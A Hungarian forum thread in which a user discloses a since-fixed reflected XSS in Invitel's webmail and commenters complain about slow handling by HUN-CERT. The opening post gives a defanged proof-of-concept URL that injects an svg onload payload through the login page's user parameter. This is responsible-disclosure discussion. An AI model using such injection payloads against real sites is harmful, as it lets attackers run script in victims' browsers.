Invitel Webmail XSS

 ( rodneymullen2 | 2018. január 11., csütörtök - 16:10 )

Invitel Webmail XSS 2016.05.22.én jelentve, aztán 2017 decemberében. 2017.12.29 sikeres javítás.

hXXps://webmail.invitel.hu/login/?user=%22%3E%3Csvg/onload=prompt%28/fail/%29%3E

Hozzászólás megjelenítési lehetőségek

A választott hozzászólás megjelenítési mód a „Beállítás” gombbal rögzíthető.

Bator voltal, hogy jelentetted. Mar a hazai viszonyokat tekintve. :)

--
Any A.I. smart enough to pass a Turing test is smart enough to know to fail it. -Ian McDonald

írok most majd pár példát ahol dolgoztam együtt a HUN-CERT-el dolgokon. Csak hogy legyen napos oldala is a dolognak ne csak a BKK példa :)

Király írások, jöhet még :)

Lehangoló, hogy a jelentéstől több mint egy év telt el a javításig.

Nekem ezzel a HUN-CERT-vel eddig semmi pozitiv tapasztalatom nincs.

Rossz helyre küldik a reportot (nem tudják megnézni az ip whoisát), sokszor csak forwaldolnak, de azt gondolom kézzel mert siman van ami 2 hetes átfutással megy, válaszolni nem válaszolnak (akkor mégse kézzel megy?).

feedbackért nekem is mindig rá kell kérdeznem sajnos. :/ Különben nem küldenek semmit csak annyi hogy értesítettük a szolgáltatót.